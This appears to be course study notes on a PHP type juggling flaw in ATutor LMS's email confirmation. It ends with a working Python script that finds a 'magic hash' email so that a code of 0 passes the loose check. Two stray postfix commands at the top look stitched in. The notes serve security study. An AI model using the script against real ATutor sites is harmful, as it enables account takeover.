5. ATutor LMS Type Juggling Vulnerability
sudo cat /etc/postfix/transport # check the modified postfix transport map
sudo postmap /etc/postfix/transport # rebuild the transport lookup table as root so postfix picks up the change
PHP Loose and Strict Comparisons
```bash
php -a # interactive PHP shell
```
```php
var_dump('0xAAAA' == '43690'); # TRUE on PHP 5: hex strings were numeric and converted implicitly (FALSE on PHP 7+)
var_dump('0xAAAA' == 43690);   # TRUE on PHP 5 for the same reason (FALSE on PHP 7+)
var_dump(0xAAAA == 43690);     # TRUE: integer literal, no string conversion involved
var_dump('0xAAAA' == '43691'); # FALSE
# Exponent quirk: a string of the form <digits>e<digits> is a numeric string in scientific
# notation, so when both sides of == are numeric strings (or one side is a number) PHP
# compares them as numbers, not character by character
var_dump('0eAAAA' == '0'); # FALSE: 'AAAA' is not a valid exponent, so this is a plain string comparison
var_dump('0e1111' == '0'); # TRUE: 0 * 10^1111 == 0
var_dump('0e9999' == 0);   # TRUE
```
Vulnerability Discovery
```php
$code = substr(md5($e . $row['creation_date'] . $id), 0, 10);
if ($code == $m) # loose comparison
```
$id   # unique ID
$e    # new email address (attacker-controlled)
$m    # confirmation code taken from the request, loosely compared against $code
$code # partially controllable MD5 hash (first 10 hex chars)
Magic Hashes
```php
# certain MD5 and SHA1 digests have the form 0e<digits only>, which PHP reads as 0 * 10^n = 0
echo md5('240610708'); # returns '0e462097431906509019562988736854', which == '0' under loose comparison
```
```python
# script to enumerate candidate email addresses (Python 3: itertools.imap and string.lowercase no longer exist)
import itertools
import string

for word in map(''.join, itertools.product(string.ascii_lowercase, repeat=int(prefix_length))):
    # itertools - iterator building blocks, lazy so the full candidate list never sits in memory
    # map - applies ''.join to each tuple of characters (replaces Python 2's itertools.imap)
    # product - cartesian product: every combination of the letters, prefix_length characters long
    ...
```
# Discovered dlv@offsec.local
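The enumeration above carried through end to end, as an added example rather than the course's or ATutor's own script: it ports the confirm.php code computation to Python 3, walks lowercase local parts exactly as the itertools.product loop does, and stops at the first one whose 10-character code has the 0e<digits> form that the loose `==` accepts for m=0; `strict_check` shows the exact-match comparison the fix needs. The domain, creation_date and id values are constructed placeholders.

```python
import hashlib
import itertools
import re
import string

# confirm.php derives the code as substr(md5($e . creation_date . $id), 0, 10)
# and tests it with a loose `==`. A code of the form 0e<digits> is a numeric
# string equal to 0, so `$code == $m` passes for m=0 without knowing the hash.
MAGIC_RE = re.compile(r"^0e[0-9]+$")


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def confirmation_code(email: str, creation_date: str, user_id: int) -> str:
    """Python port of the PHP expression from confirm.php."""
    return md5_hex(f"{email}{creation_date}{user_id}")[:10]


def is_magic(code: str) -> bool:
    """True if PHP's loose == would accept '0' / 0 for this code."""
    return MAGIC_RE.match(code) is not None


def strict_check(code: str, supplied: str) -> bool:
    """What the fixed comparison (=== / hash_equals) does: exact string match."""
    return code == supplied


def find_magic_email(domain, creation_date, user_id, prefix_length, limit=None):
    """Walk lowercase local parts of length prefix_length (the same
    itertools.product enumeration as the course script) and return the first
    (email, code) whose code is magic, or None if none is found."""
    local_parts = map("".join, itertools.product(string.ascii_lowercase, repeat=prefix_length))
    if limit is not None:
        local_parts = itertools.islice(local_parts, limit)
    for local in local_parts:
        email = f"{local}@{domain}"
        code = confirmation_code(email, creation_date, user_id)
        if is_magic(code):
            return email, code
    return None


if __name__ == "__main__":
    # Constructed values; the real creation_date and id come from the ATutor row.
    print(find_magic_email("offsec.local", "2019-05-28 10:15:22", 1, 4))
```

With a 10-character code the odds of a magic prefix are roughly 1 in 11,000, so a 4-letter local part (456,976 candidates) almost always yields a hit in under a second.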
